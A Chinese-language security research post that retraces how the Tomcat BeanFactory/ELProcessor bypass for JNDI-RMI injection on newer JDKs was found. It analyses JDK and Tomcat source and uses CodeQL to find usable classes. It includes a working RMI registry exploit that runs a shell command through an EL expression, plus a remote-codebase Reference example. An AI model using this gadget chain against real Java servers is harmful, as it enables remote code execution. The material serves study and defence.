JNDI-RMI 注入的EL 绕过思路分析

上面的JNDI 注入的JDK 版本限制已经耳熟能详了，针对JNDI-RMI 的tomcat EL 绕过姿势也被经常提起，本文尝试回溯这一姿势的发现过程。

JNDI-RMI 注入

背景知识

必须了解两个重要的类

• com.sun.jndi.rmi.registry.RegistryContext： JNDI-RMI接口
• java.rmi.registry.Registry： RMI 接口

通常攻击场景下，Registry是作为RMI服务端，RegistryContext是作为攻击的client端，也就是vuln。

低版本注入过程：RegistryContext#lookup

都在RegistryContext#lookup 里面，常见的如 ctx.lookup(“rmi://xxx/Exploit”)，被攻击过程如下

• registry#lookup 获取远程恶意server 绑定的Remote 类
• registry#decodeObject 调用该Remote类 的getObjectInstance 实例化该类

com.sun.jndi.rmi.registry.RegistryContext

   private Registry registry;
public Object lookup(Name var1) throws NamingException {
       if (var1.isEmpty()) {
           return new RegistryContext(this);
       } else {
           Remote var2;
           try {
               var2 = this.registry.lookup(var1.get(0));
           } catch (NotBoundException var4) {
               throw new NameNotFoundException(var1.get(0));
           } catch (RemoteException var5) {
               throw (NamingException)wrapRemoteException(var5).fillInStackTrace();
           }

           return this.decodeObject(var2, var1.getPrefix(1));
       }
   }

   private Object decodeObject(Remote var1, Name var2) throws NamingException {
       try {
           Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;
           return NamingManager.getObjectInstance(var3, var2, this, this.environment);

javax.naming.spi.NamingManager#getObjectInstance

public static Object
        getObjectInstance(Object refInfo, Name name, Context nameCtx,
                          Hashtable<?,?> environment)
        throws Exception
    {

        ObjectFactory factory;

        // Use builder if installed
        ObjectFactoryBuilder builder = getObjectFactoryBuilder();
        if (builder != null) {
            // builder must return non-null factory
            factory = builder.createObjectFactory(refInfo, environment);
            return factory.getObjectInstance(refInfo, name, nameCtx,
                environment);
        }

        // Use reference if possible
        Reference ref = null;
        if (refInfo instanceof Reference) {
            ref = (Reference) refInfo;
        } else if (refInfo instanceof Referenceable) {
            ref = ((Referenceable)(refInfo)).getReference();
        }

        Object answer;

        if (ref != null) {
            String f = ref.getFactoryClassName();
            if (f != null) {
                // if reference identifies a factory, use exclusively

                factory = getObjectFactoryFromReference(ref, f);
                if (factory != null) {
                    return factory.getObjectInstance(ref, name, nameCtx,
                                                     environment);
                }
                // No factory found, so return original refInfo.
                // Will reach this point if factory class is not in
                // class path and reference does not contain a URL for it
                return refInfo;

            } else {
                // if reference has no factory, check for addresses
                // containing URLs

                answer = processURLAddrs(ref, name, nameCtx, environment);
                if (answer != null) {
                    return answer;
                }
            }
        }

        // try using any specified factories
        answer =
            createObjectFromFactories(refInfo, name, nameCtx, environment);
        return (answer != null) ? answer : refInfo;
    }

注意此处，如果是Reference 对象，则会getObjectFactoryFromReference - getObjectInstance 进行实例化，也就是原本的JNDI-RMI利用流程。

高版本限制：RegistryContext#decodeObject

在JDK 6u132, JDK 7u122, JDK 8u113 中Java提升了JNDI 限制了Naming/Directory服务中JNDI Reference远程加载Object Factory类的特性。系统属性 com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false，即默认不允许从远程的Codebase加载Reference工厂类。如果需要开启 RMI Registry 或者 COS Naming Service Provider的远程类加载功能，需要将前面说的两个属性值设置为true。

实现trustURLCodebase 的逻辑在decodeObject 上

    private Object decodeObject(Remote var1, Name var2) throws NamingException {
        try {
...
            if (var8 != null && var8.getFactoryClassLocation() != null && !trustURLCodebase) {
                throw new ConfigurationException("The object factory is untrusted. Set the system property 'com.sun.jndi.rmi.object.trustURLCodebase' to 'true'.");
            } else {
                return NamingManager.getObjectInstance(var3, var2, this, this.environment);
...
    static {
        PrivilegedAction var0 = () -> {
            return System.getProperty("com.sun.jndi.rmi.object.trustURLCodebase", "false");
        };
        String var1 = (String)AccessController.doPrivileged(var0);
        trustURLCodebase = "true".equalsIgnoreCase(var1);
    }

TOMCAT EL的绕过

都知道tomcat EL可以实现绕过

System.setProperty("java.rmi.server.logCalls", "true");
Registry registry = LocateRegistry.createRegistry(1099);
// 实例化Reference，指定目标类为javax.el.ELProcessor，工厂类为org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
// 强制将 'x' 属性的setter 从 'setX' 变为 'eval', 详细逻辑见 BeanFactory.getObjectInstance 代码
ref.add(new StringRefAddr("forceString", "x=eval"));
// 利用表达式执行命令
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','open -a calculator']).start()\")"));
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
registry.bind("Exploit", referenceWrapper);

思路逆向分析

知其然更要知其所以然，这种绕过方式但是如何发现的呢？

ResourceRef 的定位

从RegistryContext#decodeObject 限制逻辑中可以看到，java.naming.Reference 用不了，因为getFactoryClassLocation 过不了。

public Reference(String className, String factory, String factoryLocation) {
    this(className);
    classFactory = factory;
    classFactoryLocation = factoryLocation;
}

那么，还有哪些类满足

1. 继承Reference
2. getFactoryClassLocation 可以为null

尝试找继承Reference 的子类

import java

class MyReference extends ClassOrInterface{
	MyReference(){
		this.getName()="Reference"
  }
}
predicate isMyClass(Class m){
	m.getASupertype*() instanceof MyReference
}
from Class c
where isMyClass(c)
select c

结论是在tomcat-catalina 中找到了

• org.apache.naming.ResourceRef
• org.apache.naming.LookupRef (可rmi转ldap，作用有限)
• org.apache.naming.HandlerRef
• org.apache.naming.EjbRef
• org.apache.naming.ResourceLinkRef
• org.apache.naming.ResourceEnvRef
• org.apache.naming.ServiceRef

以ResourceRef 为例

ReferenceWrapper 的定位

ResourceRef 定位到了，但是不能直接bind, 因为java.rmi.registry.Registry 只能bind Remote类

public void bind(String name, Remote obj)
    throws RemoteException, AlreadyBoundException, AccessException;

如果熟悉JNDI-RMI 低版本注入，应该记得这两种方式：

• 直接bind Exploit
• 通过ReferenceWrapper(reference) 实现bind 远程目标类

#1. 直接绑定存在恶意代码块的类实例
registry.bind("Exploit", (Remote) new Exploit());

#2. reference
Reference reference = new Reference("Exploit",
        "Exploit",
        "http://localhost:8000/");
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("Exploit",referenceWrapper);

但是ReferenceWrapper(ResourceRef) 可以吗？

public ReferenceWrapper(Reference var1) throws NamingException, RemoteException {
    this.wrappee = var1;
}

ResourceRef 继承Reference，可以

BeanFactory 的定位

再回顾下javax.naming.spi.NamingManager#getObjectInstance 的过程

1. ref = (Reference) refInfo;
2. String f = ref.getFactoryClassName();
3. factory = getObjectFactoryFromReference(ref, f);
4. return factory.getObjectInstance(ref, name, nameCtx, environment);

结合ResourceRef 的构造函数以及factory属性
public ResourceRef(String resourceClass, String description, String scope, String auth, boolean singleton, String factory, String factoryLocation) {

那么问题就成了：寻找可利用的Factory，需要满足

1. 继承Factory
2. getObjectInstance 有可利用空间

   import java
   
   class MyFactory extends ClassOrInterface{
   	MyFactory(){
   		this.getName()="ObjectFactory"
     }
   }
   predicate isMyClass( Class m){
   	m.getASourceSupertype() instanceof MyFactory
   }
   from Class c
   where isMyClass(c)
   select c

   找找tomcat下面符合的Factory：

• org.apache.naming.factory.BeanFactory
• org.apache.tomcat.dbcp.dbcp2.datasources.InstanceKeyDataSourceFactory
• org.apache.tomcat.jdbc.naming.GenericNamingResourcesFactory
• org.apache.tomcat.jdbc.pool.DataSourceFactory

org.apache.naming.factory.BeanFactory

利用要求总结：

1. 需要有无参构造函数
2. 可以调用符合条件的方法，要求方法的参数为1个，类型为String
3. 还可以调用set*方法，要求方法的参数为1个，类型为String
4. 以上方法都要求public

public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                Hashtable<?,?> environment)
    throws NamingException {

    Reference ref = (Reference) obj;
    String beanClassName = ref.getClassName();
    ClassLoader tcl = Thread.currentThread().getContextClassLoader();
    // 1. 反射获取类对象
    if (tcl != null) {
        beanClass = tcl.loadClass(beanClassName);
    } else {
        beanClass = Class.forName(beanClassName);
    }
    // 2. 初始化类实例
    Object bean = beanClass.getConstructor().newInstance();

    // 3. 根据 Reference 的属性查找 setter 方法的别名
    RefAddr ra = ref.get("forceString");
    String value = (String)ra.getContent();

    // 4. 循环解析别名并保存到字典中
    for (String param: value.split(",")) {
        param = param.trim();
        index = param.indexOf('=');
        if (index >= 0) {
            setterName = param.substring(index + 1).trim();
            param = param.substring(0, index).trim();
        } else {
            setterName = "set" +
                param.substring(0, 1).toUpperCase(Locale.ENGLISH) +
                param.substring(1);
        }
        forced.put(param, beanClass.getMethod(setterName, paramTypes));
    }

    // 5. 解析所有属性，并根据别名去调用 setter 方法
    Enumeration<RefAddr> e = ref.getAll();
    while (e.hasMoreElements()) {
        ra = e.nextElement();
        String propName = ra.getType();
        String value = (String)ra.getContent();
        Object[] valueArray = new Object[1];
        Method method = forced.get(propName);
        if (method != null) {
            valueArray[0] = value;
            method.invoke(bean, valueArray);
        }
        // ...
    }
}

org.apache.tomcat.dbcp.dbcp2.datasources.InstanceKeyDataSourceFactory

利用要求总结：

1. 如果有本地Gadgets，可以反序列化，鸡肋

@Override
public Object getObjectInstance(final Object refObj, final Name name, final Context context,
        final Hashtable<?, ?> env) throws IOException, ClassNotFoundException {
    // The spec says to return null if we can't create an instance
    // of the reference
    Object obj = null;
    if (refObj instanceof Reference) {
        final Reference ref = (Reference) refObj;
        if (isCorrectClass(ref.getClassName())) {
            final RefAddr refAddr = ref.get("instanceKey");
            if (refAddr != null && refAddr.getContent() != null) {
                // object was bound to JNDI via Referenceable API.
                obj = instanceMap.get(refAddr.getContent());
            } else {
                // Tomcat JNDI creates a Reference out of server.xml
                // <ResourceParam> configuration and passes it to an
                // instance of the factory given in server.xml.
                String key = null;
                if (name != null) {
                    key = name.toString();
                    obj = instanceMap.get(key);
                }
                if (obj == null) {
                    final InstanceKeyDataSource ds = getNewInstance(ref);
                    setCommonProperties(ref, ds);
                    obj = ds;
                    if (key != null) {
                        instanceMap.put(key, ds);
                    }
                }
            }
        }
    }
    return obj;
}

private void setCommonProperties(final Reference ref, final InstanceKeyDataSource ikds)
        throws IOException, ClassNotFoundException {
    RefAddr refAddr = ref.get("dataSourceName");
    if (refAddr != null && refAddr.getContent() != null) {
        ikds.setDataSourceName(refAddr.getContent().toString());
    }
    refAddr = ref.get("description");
    if (refAddr != null && refAddr.getContent() != null) {
        ikds.setDescription(refAddr.getContent().toString());
    }
    refAddr = ref.get("jndiEnvironment");
    if (refAddr != null && refAddr.getContent() != null) {
        final byte[] serialized = (byte[]) refAddr.getContent();
        ikds.setJndiEnvironment((Properties) deserialize(serialized));
    }
   	...
    
protected static final Object deserialize(final byte[] data) throws IOException, ClassNotFoundException {
    ObjectInputStream in = null;
    try {
        in = new ObjectInputStream(new ByteArrayInputStream(data));
        return in.readObject();
    } finally {
        if (in != null) {
            try {
                in.close();
            } catch (final IOException ex) {
                // ignore
            }
        }
    }
}

org.apache.tomcat.jdbc.naming.GenericNamingResourcesFactory

利用要求总结：

1. 需要有无参构造函数
2. 可以调用set*方法，要求方法的参数为1个，类型为String/Int/Long/Boolean/InetAddress
3. 以上方法都要求public
   不如BeanFactory，鸡肋

public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
    if ((obj == null) || !(obj instanceof Reference)) {
        return null;
    }
    Reference ref = (Reference) obj;
    Enumeration<RefAddr> refs = ref.getAll();
    String type = ref.getClassName();
    Object o =
        ClassLoaderUtil.loadClass(
            type,
            GenericNamingResourcesFactory.class.getClassLoader(),
            Thread.currentThread().getContextClassLoader()).getConstructor().newInstance();
    while (refs.hasMoreElements()) {
        RefAddr addr = refs.nextElement();
        String param = addr.getType();
        String value = null;
        if (addr.getContent()!=null) {
            value = addr.getContent().toString();
        }
        if (setProperty(o, param, value)) {
        } else {
            log.debug("Property not configured["+param+"]. No setter found on["+o+"].");
        }
    }
    return o;
}

org.apache.tomcat.jdbc.pool.DataSourceFactory

利用要求总结：

1. 如果在rmi有限制url的情况，可以转jndi-ldap进行攻击

不如BeanFactory，鸡肋

@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                Hashtable<?,?> environment) throws Exception {
    // We only know how to deal with <code>javax.naming.Reference</code>s
    // that specify a class name of "javax.sql.DataSource"
    if ((obj == null) || !(obj instanceof Reference)) {
        return null;
    }
    Reference ref = (Reference) obj;
    boolean XA = false;
    boolean ok = false;
    if ("javax.sql.DataSource".equals(ref.getClassName())) {
        ok = true;
    }
    if ("javax.sql.XADataSource".equals(ref.getClassName())) {
        ok = true;
        XA = true;
    }
    if (org.apache.tomcat.jdbc.pool.DataSource.class.getName().equals(ref.getClassName())) {
        ok = true;
    }
    if (!ok) {
        log.warn(ref.getClassName()+" is not a valid class name/type for this JNDI factory.");
        return null;
    }
    Properties properties = new Properties();
    for (int i = 0; i < ALL_PROPERTIES.length; i++) {
        String propertyName = ALL_PROPERTIES[i];
        RefAddr ra = ref.get(propertyName);
        if (ra != null) {
            String propertyValue = ra.getContent().toString();
            properties.setProperty(propertyName, propertyValue);
        }
    }
    return createDataSource(properties,nameCtx,XA);
}
    public DataSource createDataSource(Properties properties) throws Exception {
    return createDataSource(properties,null,false);
}
public DataSource createDataSource(Properties properties,Context context, boolean XA) throws Exception {
    PoolConfiguration poolProperties = DataSourceFactory.parsePoolProperties(properties);
    if (poolProperties.getDataSourceJNDI()!=null && poolProperties.getDataSource()==null) {
        performJNDILookup(context, poolProperties);
    }
    org.apache.tomcat.jdbc.pool.DataSource dataSource = XA?
            new org.apache.tomcat.jdbc.pool.XADataSource(poolProperties) :
            new org.apache.tomcat.jdbc.pool.DataSource(poolProperties);
    //initialise the pool itself
    dataSource.createPool();
    // Return the configured DataSource instance
    return dataSource;
}

javax.el.ELProcessor 的定位

这个只能归结为经验吧，原生jdk里能够命令执行的sink毕竟不多。

思考

1. 如果是bind触发，有没有什么不一样?
2. Weblogic/jboss/Websphere 等其他web容器上呢，是否也有类似的Factory？

总结

本文首先介绍了一些已知的知识点：

1. JNDI-RMI 低版本注入的逻辑
2. JNDI-RMI 高版本注入的限制：decodeObject 限制了Reference 类，以及Tomcat EL 绕过的方式

在此基础上，本文尝试回溯EL 绕过方式的发现思路

1. 首先寻找能够突破decodeObject 限制的Reference 子类
2. 寻找能够利用的Factory

最终成功回溯出了EL 绕过方式，以及一些其他的鸡肋姿势，颇有收获。

@20220318

膜一个浅蓝师傅，在BeanFactory 的利用上找到了除EL 之外的多个sink，还有MemoryUserDatabaseFactory、BasicDataSourceFactory 等几个其他的Factory，功力深厚，膜一个。

参考

• [1]如何绕过高版本JDK的限制进行JNDI注入利用 (by: KINGX)
• [2]探索高版本 JDK 下 JNDI 漏洞的利用方法(by: 浅蓝)